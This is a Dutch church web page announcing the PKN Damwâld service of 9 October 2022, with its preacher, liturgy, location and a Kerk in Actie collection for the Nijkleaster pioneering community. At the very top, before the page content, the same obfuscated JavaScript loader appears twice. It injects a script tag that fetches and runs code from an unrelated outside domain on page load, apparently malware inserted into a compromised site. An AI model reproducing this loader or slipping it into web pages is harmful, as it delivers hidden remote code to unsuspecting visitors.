;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 9 oktober 2022 9:30 uur - PKN Damwâld
zondag 9 oktober 2022
09:30 uur

Kerkdienst zondag 9 oktober 2022 9:30 uur

Thema: ‘Wie zit er op jouw troon?’

Informatie

Voorganger:Robert Colijn
Organist:Margrietha Zagema
Thema:‘Wie zit er op jouw troon?’
LivestreamDienst terugkijken
Bekijk op Youtube
Liturgie
Lied voor de dienst: ELB 356
Welkom
We zingen: Gezang 460: 1,2,5
Stilte voor God Votum & Groet, Gebed
We zingen: Psalm 150
Kindermoment ELB 468
Gebed
Bijbel open .
We zingen: Opwekking 298
Bijbel open .
We zingen: Gezang 434: 1,3,5
Preek ‘Wie zit er op jouw troon?’
Luisterlied ‘Let the King of my heart’
We zingen: ELB 409
Gebed en voorbede
We zingen: Gezang 473: 1,2,3,4
Zegen
Collecte
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Uitganscollecte: Collecte Kerk in Actie Zending Missionair werk

Collecte Kerk in Actie 2022 – Missionair Werk (collectenummer 22095)
Hoewel In Nederland steeds minder mensen naar de kerk gaan, is de behoefte aan zingeving groot. Kerken spelen hierop in met pioniersplekken, nieuwe christelijke geloofsgemeenschappen waar de boodschap van het evangelie wordt gedeeld op een manier waarin mensen zich herkennen. Pioniersplek Nijkleaster in Jorwert is zo'n plek van stilte, bezinning en verbinding, die zoekt naar nieuwe wegen voor geloof en spiritualiteit. Een oase van rust en stilte midden op het platteland, waar ruimte wordt gegeven aan mensen, de schepping en aan God. Als open klooster biedt Nijkleaster gastvrijheid aan mannen en vrouwen uit diverse kerken en tradities, ook aan degenen die zich niet (meer) thuis voelen binnen de bestaande kerken. Mensen ontmoeten elkaar in liturgie en gesprek, stilte en wandeling, plezier en recreatie.